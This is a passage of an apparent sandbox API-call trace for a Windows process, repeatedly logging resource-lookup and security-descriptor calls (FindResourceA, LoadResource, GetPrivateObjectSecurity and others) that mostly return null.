GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.916] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.916] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.916] LockResource (hResData=0x0) returned 0x0 [0069.916] FreeResource (hResData=0x0) returned 0 [0069.916] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.916] LockResource (hResData=0x0) returned 0x0 [0069.916] FreeResource (hResData=0x0) returned 0 [0069.916] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.916] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.916] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.917] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.917] LockResource (hResData=0x0) returned 0x0 [0069.917] FreeResource (hResData=0x0) returned 0 [0069.917] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.917] LockResource (hResData=0x0) returned 0x0 [0069.917] FreeResource (hResData=0x0) returned 0 [0069.917] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.917] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.917] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.917] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.917] LockResource (hResData=0x0) returned 0x0 [0069.917] FreeResource (hResData=0x0) returned 0 [0069.917] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.917] LockResource (hResData=0x0) returned 0x0 [0069.917] FreeResource (hResData=0x0) returned 0 [0069.917] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.917] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.917] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.917] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.917] LockResource (hResData=0x0) returned 0x0 [0069.917] FreeResource (hResData=0x0) returned 0 [0069.917] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.917] LockResource (hResData=0x0) returned 0x0 [0069.917] FreeResource (hResData=0x0) returned 0 [0069.917] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.917] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.918] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.918] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.918] LockResource (hResData=0x0) returned 0x0 [0069.918] FreeResource (hResData=0x0) returned 0 [0069.918] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.918] LockResource (hResData=0x0) returned 0x0 [0069.918] FreeResource (hResData=0x0) returned 0 [0069.918] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.918] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.918] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.918] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.918] LockResource (hResData=0x0) returned 0x0 [0069.918] FreeResource (hResData=0x0) returned 0 [0069.918] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.918] LockResource (hResData=0x0) returned 0x0 [0069.918] FreeResource (hResData=0x0) returned 0 [0069.918] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.918] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.918] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.918] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.918] LockResource (hResData=0x0) returned 0x0 [0069.918] FreeResource (hResData=0x0) returned 0 [0069.918] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.918] LockResource (hResData=0x0) returned 0x0 [0069.918] FreeResource (hResData=0x0) returned 0 [0069.918] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.918] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.918] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.918] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.918] LockResource (hResData=0x0) returned 0x0 [0069.918] FreeResource (hResData=0x0) returned 0 [0069.918] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.918] LockResource (hResData=0x0) returned 0x0 [0069.918] FreeResource (hResData=0x0) returned 0 [0069.918] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.918] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.919] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.919] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.919] LockResource (hResData=0x0) returned 0x0 [0069.919] FreeResource (hResData=0x0) returned 0 [0069.919] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.919] LockResource (hResData=0x0) returned 0x0 [0069.919] FreeResource (hResData=0x0) returned 0 [0069.919] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.919] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.919] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.919] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.919] LockResource (hResData=0x0) returned 0x0 [0069.919] FreeResource (hResData=0x0) returned 0 [0069.919] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.919] LockResource (hResData=0x0) returned 0x0 [0069.919] FreeResource (hResData=0x0) returned 0 [0069.919] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.919] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.919] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.919] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.919] LockResource (hResData=0x0) returned 0x0 [0069.919] FreeResource (hResData=0x0) returned 0 [0069.919] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.919] LockResource (hResData=0x0) returned 0x0 [0069.919] FreeResource (hResData=0x0) returned 0 [0069.919] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.919] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.919] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.919] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.919] LockResource (hResData=0x0) returned 0x0 [0069.919] FreeResource (hResData=0x0) returned 0 [0069.919] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.919] LockResource (hResData=0x0) returned 0x0 [0069.919] FreeResource (hResData=0x0) returned 0 [0069.919] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.919] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.919] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.919] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.919] LockResource (hResData=0x0) returned 0x0 [0069.919] FreeResource (hResData=0x0) returned 0 [0069.920] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.920] LockResource (hResData=0x0) returned 0x0 [0069.920] FreeResource (hResData=0x0) returned 0 [0069.920] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.920] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.920] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.920] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.920] LockResource (hResData=0x0) returned 0x0 [0069.920] FreeResource (hResData=0x0) returned 0 [0069.920] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.920] LockResource (hResData=0x0) returned 0x0 [0069.920] FreeResource (hResData=0x0) returned 0 [0069.920] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.920] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.920] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.920] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.920] LockResource (hResData=0x0) returned 0x0 [0069.920] FreeResource (hResData=0x0) returned 0 [0069.920] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.920] LockResource (hResData=0x0) returned 0x0 [0069.920] FreeResource (hResData=0x0) returned 0 [0069.920] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.920] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.920] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.920] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.920] LockResource (hResData=0x0) returned 0x0 [0069.920] FreeResource (hResData=0x0) returned 0 [0069.920] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.920] LockResource (hResData=0x0) returned 0x0 [0069.920] FreeResource (hResData=0x0) returned 0 [0069.920] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.920] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.920] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.920] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.920] LockResource (hResData=0x0) returned 0x0 [0069.920] FreeResource (hResData=0x0) returned 0 [0069.920] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.920] LockResource (hResData=0x0) returned 0x0 [0069.920] FreeResource (hResData=0x0) returned 0 [0069.920] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.920] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.921] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.921] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.921] LockResource (hResData=0x0) returned 0x0 [0069.921] FreeResource (hResData=0x0) returned 0 [0069.921] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.921] LockResource (hResData=0x0) returned 0x0 [0069.921] FreeResource (hResData=0x0) returned 0 [0069.921] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.921] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.921] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.921] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.921] LockResource (hResData=0x0) returned 0x0 [0069.921] FreeResource (hResData=0x0) returned 0 [0069.921] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.921] LockResource (hResData=0x0) returned 0x0 [0069.921] FreeResource (hResData=0x0) returned 0 [0069.921] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.921] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.921] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.921] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.921] LockResource (hResData=0x0) returned 0x0 [0069.921] FreeResource (hResData=0x0) returned 0 [0069.921] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.921] LockResource (hResData=0x0) returned 0x0 [0069.921] FreeResource (hResData=0x0) returned 0 [0069.921] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.921] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.921] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.921] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.921] LockResource (hResData=0x0) returned 0x0 [0069.921] FreeResource (hResData=0x0) returned 0 [0069.922] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.922] LockResource (hResData=0x0) returned 0x0 [0069.922] FreeResource (hResData=0x0) returned 0 [0069.922] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.922] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.922] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.922] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.922] LockResource (hResData=0x0) returned 0x0 [0069.922] FreeResource (hResData=0x0) returned 0 [0069.922] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.922] LockResource (hResData=0x0) returned 0x0 [0069.922] FreeResource (hResData=0x0) returned 0 [0069.922] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.922] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.922] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.922] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.922] LockResource (hResData=0x0) returned 0x0 [0069.922] FreeResource (hResData=0x0) returned 0 [0069.922] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.922] LockResource (hResData=0x0) returned 0x0 [0069.922] FreeResource (hResData=0x0) returned 0 [0069.922] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.922] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.922] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.922] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.922] LockResource (hResData=0x0) returned 0x0 [0069.922] FreeResource (hResData=0x0) returned 0 [0069.922] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.922] LockResource (hResData=0x0) returned 0x0 [0069.922] FreeResource (hResData=0x0) returned 0 [0069.922] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.923] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.923] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.923] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.923] LockResource (hResData=0x0) returned 0x0 [0069.923] FreeResource (hResData=0x0) returned 0 [0069.923] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.923] LockResource (hResData=0x0) returned 0x0 [0069.923] FreeResource (hResData=0x0) returned 0 [0069.923] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.923] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.923] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.923] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.923] LockResource (hResData=0x0) returned 0x0 [0069.923] FreeResource (hResData=0x0) returned 0 [0069.923] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.923] LockResource (hResData=0x0) returned 0x0 [0069.923] FreeResource (hResData=0x0) returned 0 [0069.923] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.923] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: 